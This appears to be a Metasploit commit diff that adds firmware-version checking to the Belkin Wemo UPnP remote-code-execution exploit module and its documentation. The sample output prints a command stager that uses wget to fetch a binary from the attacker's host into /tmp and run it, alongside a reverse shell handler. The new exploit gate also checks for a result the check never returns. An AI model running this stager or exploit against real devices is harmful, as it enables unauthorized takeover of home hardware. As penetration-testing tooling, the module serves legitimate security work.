Land #11464, version checking for Wemo exploit

2019-03-04 18:18:02 -06:00 · 2019-03-04 18:18:02 -06:00 · f8208bf0ef
parent 822f5357a2 98f494acab
commit f8208bf0ef
2 changed files with 33 additions and 8 deletions
--- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
+++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
@ -32,7 +32,9 @@ for Crock-Pot and 49153 for other devices.
 msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run

 [*] Started reverse TCP handler on 10.22.22.4:4444
-[+] Wemo-enabled device detected
+[*] Wemo-enabled device detected
+[*] Found firmware version: 2.00.6461
+[*] 10.22.22.1:49152 - The target appears to be vulnerable.
 [*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
 [*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
 [*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
      },
      'Author'             => [
        'phikshun', # Discovery, UFuzz, and modules
-        'wvu'       # Crock-Pot testing and module
+        'wvu',      # Crock-Pot testing and module
+        'nstarke'   # Version-checking research and implementation
      ],
      'References'         => [
        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
        'Stability'        => [CRASH_SAFE],
        'SideEffects'      => [ARTIFACTS_ON_DISK],
        'Reliablity'       => [REPEATABLE_SESSION],
-        'NOCVE'            => 'Patched in 2.00.8643' # TODO: Add firmware check
+        'NOCVE'            => 'Patched in 2.00.8643'
      }
    ))

@ -76,23 +77,45 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
+    checkcode = CheckCode::Unknown
+
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/setup.xml'
    )

-    if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
-      vprint_good('Wemo-enabled device detected')
-      return CheckCode::Appears
+    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
+      vprint_error('Wemo-enabled device not detected')
+      return checkcode
    end

-    CheckCode::Safe
+    vprint_status('Wemo-enabled device detected')
+    checkcode = CheckCode::Detected
+
+    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
+              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Gem::Version.new($1)
+
+    unless version
+      vprint_error('Could not determine firmware version')
+      return checkcode
+    end
+
+    vprint_status("Found firmware version: #{version}")
+
+    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
+    if version < Gem::Version.new('2.00.8643')
+      checkcode = CheckCode::Appears
+    else
+      checkcode = CheckCode::Safe
+    end
+
+    checkcode
  end

  def exploit
    checkcode = check

-    unless checkcode == CheckCode::Appears || datastore['ForceExploit']
+    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end